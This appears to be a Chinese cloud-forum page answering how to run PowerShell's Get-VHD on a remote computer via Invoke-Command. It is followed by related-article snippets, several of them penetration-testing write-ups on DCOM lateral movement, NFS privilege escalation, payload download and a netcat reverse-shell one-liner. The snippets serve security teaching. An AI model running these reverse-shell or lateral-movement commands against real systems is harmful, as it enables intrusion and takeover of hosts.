power shell在远程计算机上调用get-VHD

PowerShell是一种任务自动化和配置管理框架，它可以在Windows操作系统上执行脚本和命令。它提供了一个强大的命令行界面，可以与远程计算机进行交互。

在远程计算机上调用Get-VHD是指使用PowerShell命令Get-VHD来获取虚拟硬盘（VHD）的信息。VHD是一种虚拟化技术，它允许将一个或多个虚拟硬盘文件作为单个文件进行管理。Get-VHD命令可以用于获取VHD的属性，如文件路径、大小、类型等。

PowerShell提供了一种方便的方式来在远程计算机上执行命令，这对于管理大型云计算环境非常有用。通过使用PowerShell的远程功能，可以轻松地在多台计算机上执行相同的命令，从而提高效率和一致性。

对于远程调用Get-VHD命令，可以使用PowerShell的Invoke-Command命令来实现。以下是一个示例：

$remoteComputer = "远程计算机名称"
$scriptBlock = {
    Get-VHD
}
Invoke-Command -ComputerName $remoteComputer -ScriptBlock $scriptBlock

在上述示例中，将远程计算机的名称存储在$remoteComputer变量中，并使用$scriptBlock定义要在远程计算机上执行的命令。然后，使用Invoke-Command命令指定远程计算机的名称和要执行的脚本块。

关于PowerShell的更多信息和用法，可以参考腾讯云的PowerShell文档：PowerShell文档

相关·内容

内网渗透测试：利用DCOM进行横向渗透

利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。 DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM 使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法。...在远程主机上执行命令时，必须使用域管的administrator账户或者目标主机具有管理员权限的账户（1）调用MMC20.Application远程执行命令测试环境如下：如图中，右侧是一个内网环境...F6A8-11CF-A442-00A0C90A8F39',"192.168.52.138")) # 然后执行如下命令，我们就可以调用该对象的"ShellExecute"方法在远程主机上启动进程: 完整的命令..."DDEInitiate"方法在远程主机上启动进程:$com.DDEInitiate("cmd.exe","/c C:\shell.exe") （4）调用ShellBrowserWindow远程执行命令

2.6K2 0

内网渗透之DCOM横向移动

利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求 COM提供了一套允许在同一台计算机上的客户端和服务器之间进行通信的接口(运行在Windows95及之后版本的操作系统中)。...DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法攻击者在进行横向移动时...使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。..."shellExecute"方法在远程主机上启动进程: $com.[0].Document.Application.shellExecute("c:\hhh.exe") 调用Outlook.Application

2.2K2 0

win10 安装scoop的正确姿势

先导为什么想要安装scoop并且是在win10中呢？...这个问题主要聚焦于我的游戏小主机上，我想要能够随时玩游戏的同时也能够进一定的博客工作或者轻量级的开发（现在wsl2中），所以需要使用scoop这个Windows的命令行工具。...但是这个工具在国内进行安装是有一定的难度的，主要是网络环境以及系统的需求，所以做此帖子留作参考系统需求操作系统： win10 （主要是基本能够一步到位，不用考虑以下因素，当然，Windows的其他发行版满足以下需求也可以进行安装...） power shell版本： 3.0以上网络需求能够正常访问GitHub的raw文件地址，如果访问不了一般报以下错误（无法访问GitHub的raw文件地址） ?...安装安装一般有三部：配置运行环境、安装scoop、测试scoop 配置运行环境一般需要是的power shell处于可远程执行的状态，所以需要i切换运行策略(ExecutionPolicy) Set-ExecutionPolicy

2.2K2 0

Linux提权姿势二：利用NFS提权

网络文件系统（NFS）是一个客户端/服务器应用程序，它使计算机用户可以查看和选择存储和更新远程计算机上的文件，就像它们位于用户自己的计算机上一样。...NFS是基于UDP/IP协议的应用，其实现主要是采用远程过程调用RPC机制，RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。...Root Squashing（root_sqaush）参数阻止对连接到NFS卷的远程root用户具有root访问权限。远程根用户在连接时会分配一个用户“ nfsnobody ”，它具有最少的本地特权。...如果 no_root_squash 选项开启的话”，并为远程用户授予root用户对所连接系统的访问权限。在配置NFS驱动器时，系统管理员应始终使用“ root_squash ”参数。...showmount -d 显示客户端信息和共享目录 # showmount -a 显示指定NFS服务器的客户端信息和共享目录 # showmount -a 192.168.1.1 这里不多说了我们接下来在我们的攻击机上安装客户端工具

5K2 0

Linux 系统运维工具 OpenLMI

、Java 或者命令行界面调用系统管理。...LMIshell，这是一个客户端客户端程序，它的作用是通过 OpenLMI object broker 來调用 LMI Providers。...net dns add enp0s3 192.168.0.1 用户和用户组管理 lmi 的 user 和 group 子命令是用来进行用户和用户组管理的，使用这两个命令可以查看、添加、删除本地或者远程主机上的系统帐户...子命令是用来进行电源管理的，使用这两个命令可以启动、关闭、休眠计算机。...– all 设置远程主机上的 raid 存储 #lmi -h managedsystem.mydomain.org storage raid create 5 /dev/sdb /dev/sdd

9.5K4 0

DOS命令 tasklist

在Windows XP中使用“Ctrl+Alt+Del”组合键，进入“Windows 任务管理器”，在“进程”选项卡中可以查看本机完整的进程列表，而且可以通过手工定制进程列表的方式获得更多的进程信息，...其实，在Windows XP中新增的一个命令行工具“Tasklist.exe”就能实现上面的功能。作用：用来显示运行在本地或远程计算机上的所有进程，带有多个执行参数。...（2）显示运行在本地或远程计算机上的所有进程，输入tasklist回车即可。本机的显示结果由5部分组成：图像名（进程名）、PID、会话名、会话#和内存使用。...在命令提示符下输入“Tasklist /s 192.168.1.13 /u itcso /p 12345678”（不包括引号），即可查看到IP地址为192.168.1.13的远程系统的进程。...（5）查看调用DLL模块文件的进程列表要查看本地系统中哪些进程调用了shell32.dll模块文件，只须在命令提示符下输入“Tasklist /m shell32.dll”即可显示这些进程的列表。

1.3K1 0

1.9K Star开源一款掌控远程计算机,轻松实现一键远程控制,谁想到是小众编程语言写的

软件介绍 Power Remote Desktop 基于 PowerShell 编码，并不依赖于任何现有的远程桌面应用程序或协议，并且它只是单纯的 PowerShell 代码实现。...功能特点远程桌面访问：PowerRemoteDesktop允许用户通过使用 TCP/IP 协议在目标计算机上远程访问桌面界面。无论您身在何处，只需几个简单的步骤即可与远程计算机建立连接。...文件传输：软件内置的文件传输功能可让用户在本地计算机和远程计算机之间方便地传输文件。这对于共享文件、备份数据或在远程计算机上执行文件操作非常有用。...进程和服务管理：用户可以通过PowerRemoteDesktop监控和管理远程计算机上的进程和服务。这可以帮助用户轻松控制和维护远程系统，提高效率和便利性。...6.如果需要管理远程计算机上的进程或服务，请点击软件界面上的“进程/服务管理”选项。您可以查看和管理正在运行的进程和服务，根据需要进行操作。 7.使用完毕后，关闭连接以断开与目标计算机的远程访问。

4692 0

内网环境下的横向移动总结

利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM 使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法。...使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。...","Minimized") 执行以上命令我们就可以调用ExecuteShellCommand方法在远程主机上启动进程调用9BA05972-F6A8-11CF-A442-00A0C90A8F39..."DDEInitiate"方法在远程主机上启动进程 $com.DDEInitiate("cmd.exe","/c C:\shell.exe") PTH(pass the hash) pass-the-hash

2.9K2 0

内网渗透 | 横向移动总结

，这是我之前在实战的过程中拿到了一个oa系统的shell，但是这里在webshell处不能够执行命令，这时候就可以调用at命令调用cmd执行系统命令 ?...利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM 使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法。...","Minimized") 执行以上命令我们就可以调用ExecuteShellCommand方法在远程主机上启动进程 ?..."DDEInitiate"方法在远程主机上启动进程$com.DDEInitiate("cmd.exe","/c C:\shell.exe") 这里就不再列举其他方法了，这一部分因为知识储备的问题很多都是借鉴大佬们的思想

3.6K2 0

activexobject是什么意思_session函数

在某些情况下，这些程序可被用来以您不允许的方式从计算机收集信息、破坏您的计算机上的数据、在未经您同意的情况下在您的计算机上安装软件或者允许他人远程控制您的计算机。...要在远程网络计算机创建对象，可以将该计算机的名称传递给 ActiveXObject 的 servername 参数。该名称与共享名的机器名部分相同。...下面的代码返回在名为 “myserver” 的远程网络计算机上运行的 Excel 实例的版本号： 1 function GetAppVersion() { 2 var XLApp = new...; } catch(e) { alert(“删除路径不正确”); } } } //取得文件信息调用方式如...ExcelSheet.SaveAs(“C:\\TEST.XLS”); ExcelSheet.Application.Quit(); alert(‘ok’)； } 调用系统的打印功能

7552 0

内网渗透测试：内网横向移动基础总结

ID为1，在18:53:00执行shell.exe程序的计划任务等到时间到达18:53:00时，目标主机上的木马程序shell.exe执行，攻击者主机上面的msfconsole上成功获得目标主机的meterpreter...此部分的更多详情请看我的文章：《内网横向移动：利用WMI来渗透》利用DCOM在远程机器中执行命令 DCOM（分布式组件对象模型）是微软基于组件对象模型（COM）的一些列概念和程序接口，COM提供了一套允许在同一台计算机上的客户端和服务器之间通信的接口...通过DCOM，客户端程序对象能够向网络中的另一台计算机上的服务器程序对象发送请求。下面通过一个实验来讲解如何使用DCOM在远程主机上面执行命令。...然后对DC执行远程命令（1）调用MMC20.Application远程执行命令建立ipc连接并上传木马后，在Windows7的powershell中输入如下命令，在远程系统中运行metasploit...// 然后执行如下命令，我们就可以调用”ExecuteShellCommand”方法在远程主机上启动进程 $com.Document.ActiveView.ExecuteShellCommand('cmd.exe

3.1K1 0

WindowsLinux文件下载方式汇总

在我们渗透测试过程中我们可以通过在攻击主机上搭建FTP服务，之后在目标主机上通过cmd下的ftp进行远程连接: 首先，在攻击主机使用IPOP启动一个简易的FTP服务： ?...之后在目标主机上远程下载evil.exe文件： ?...程序(这里以弹计算器为例，在实战中可以根据需要进行修改)，并启动一个简易HTTP服务： ?...Python Python是目前很受欢迎的主流脚本语言，当目标主机内安装了python时，我们可以在shell中使用python来实现远程文件下载： Type "help", "copyright",...之后在目标主机上远程下载evil.exe文件： ?

1.9K5 0

Ansible 命令执行模块（学习笔记九）

模块自带的参数： ansible all -a "pwd chdir=/tmp" image.png 3、command不支持管道命令： image.png 4、raw和command类似，两个模块都是调用远程主机的指令...，但是raw支持管道命令： ansible all -m raw -a "cd /tmp;pwd" image.png shell、script 5、shell模块调用远程主机的指令，支持shell...特性，包括执行脚本、管道命令等： ansible all -m shell -a "cd /tmp;pwd" image.png 6、shell直接执行脚本，执行的脚本放在远程主机上： ansible...all -m shell -a "/root/test.sh" iamge.png 7、script只能执行脚本，不能调用其他指令，但是script执行的是存放在ansbile管理机上的脚本，并且script...script和shell的区别是一个执行控制端的脚本，一个执行远程端的脚本。

9552 0

ChatGPT教你adb命令测试

设备上不需要安装，只需要在手机上打开选项-设置-应用程序-USB调试（4.0+：设备－开发人员选项）。...－r 强制安装（在某些情况下可以已有些应用程序在运行或不可写或已安装，可加上此参数强制安装）－s 将apk文件安装在SD-Card adb -s 物理设备序列号 install 路径\...com.tencent.wstt.gt 9、adb push : 用push命令可以把本机电脑上的文件或者文件夹复制到设备(手机) 例：传送文件到手机中,如...com.netease.cloudmusic.csv /storage/emulated/0/Emmagee/20180802142240_com.netease.cloudmusic.csv 10、adb pull <远程路径...dumpsys power 21、查看cpu等硬件信息 adb shell cat /proc/cpuinfo /proc 分区保存的CPU 内存等信息22、查看内存信息 adb

12.3K1 0

adb命令总结

1.3K2 0

meterpreter shell | 加固shell

https://null-byte.wonderhowto.com/how-to/elevate-netcat-shell-meterpreter-session-for-more-power-control...-0193211/ metasploit 中的 meterpreter shell 是一个我们比较喜欢的shell，因为方便我们后续加载各种模块，简直不要太方便所以我们这次把一个简单的shell升级为...目标主机上直接nc 反弹shell rm -f /tmp/f; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.38 5555 > /...我们使用 sessions -u 1 将普通shell提升为 meterpreter shell（创建一个新的shell） ?...可以看到有一个新的meterpreter shell 产生了，仔细看回显其实可以看出实际上是调用了 post/multi/manage/shell_to_meterpreter 我们进入这个shell来测试一下吧

1.6K2 0

如何保持Android设备屏幕常亮?

解决思路解决思路主要是通过有两种方式: 1、使用adb命令亮屏点亮屏幕—>解锁屏幕点亮屏幕：adb shell input keyevent KEYCODE_POWER 解锁屏幕：adb shell...input keyevent 82 在jenkins的shell中执行自动化脚本前执行adb命令亮屏。...adb -s ${device_name} shell input keyevent KEYCODE_POWER cd ${project_path} && sh monkey.sh -p com.zhihu.android...中的onCreate生命周期中调用。...然后，把项目编译成apk安装到手机上，执行如下命令: adb -s ${device_name} shell am start -n com.finddreams.screenlonglight/com.finddreams.screenlonglight.MainActivity

4.2K2 0

利用SSH隧道技术穿越内网访问远程设备

如果指定了命令，命令将在远程主机上执行，而不是在本机 shell 里执行。...2.1.2 C 代码中 T 连接 A 的处理 C 代码中主要还是调用 2.1.1 节中的命令。但是由 C 代码编译生成的进程无法在命令行和用户进行交互，因此要避免交互问题。 1....2) 用 expect 调用 shell 脚本，向 shell 脚本发送密码。这种方式是模拟键盘输入。 3) 如果是 openssh，则用 sshpass 向 ssh 命令行传递密码。...2) 在代理机的 shell 中执行如下命令登录远程设备： ssh -p 10022 root@127.0.0.1 -vvv 注意，此命令中用户 root 及其密码是远程设备上的账户。...可以在调试机 Windows 命令行中执行： ssh -p 10022 root@120.198.45.126 -vvv 对于本地计算机来说，待调试的设备 ip 地址不可见。

2.3K3 0

域内横向移动分析及防御

说白了就是使用工具将散列值传递到其他计算机中，进行权限验证，实现对远程计算机的控制在实际测试中，更新KB287l997后无法使用常规的哈希传递方法进行横向移动，但Administrator账号（SID...五、PsExec PsExec是微软官方PsTools工具包中的软件起初主要是用于大批量Windows主机的运维，在域环境下效果甚好通过PsExec，可以在远程计算机上执行命令，也可以将管理员权限提升到...PsExec的基本原理是：通过管道在远程目标计算机上创建一个psexec服务，并在本地磁盘中生成一个名为“PSEXECSVC”的二进制文件，然后通过psexec服务运行命令，运行结束后删除任务需要远程系统开启...DCOM（Distributed Component Object Model，分布式组件对象模型）是微软的一系列概念和程序接口基于组件对象模型（COM），COM提供了一套允许在同一台计算机上的客户端和服务端之间进行通信的接口...（Win95及之后）客户端程序对象能够对网络中的另一台计算机上的服务器程序对象发送请求执行流程同样：通过ipc$连接远程计算机执行命令 1、通过本地DCOM执行命令获取DCOM程序列表： //

1.5K1 1

tasklist命令

[align=center][size=large]Tasklist命令[/size][/align] Tasklist命令用来显示运行在本地或远程计算机上的所有进程，带有多个执行参数使用格式...[/P [password]]]] [/M [module] | /SVC | /V] [/FI filter] [/FO format] [/NH] 参数含义 /S system　指定连接到的远程系统.../M [module]　列出调用指定的DLL模块的所有进程。如果没有指定模块名，显示每个进程加载的所有模块。　　 /SVC　显示每个进程中的服务。　　 /V　显示详细信息。　　...实例1：查看调用DLL模块文件的进程列表　　要查看本地系统中哪些进程调用了shell32.dll模块文件，只需在命令提示符下输入“Tasklist /m shell32.dll”即可显示这些进程的列表

3442 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云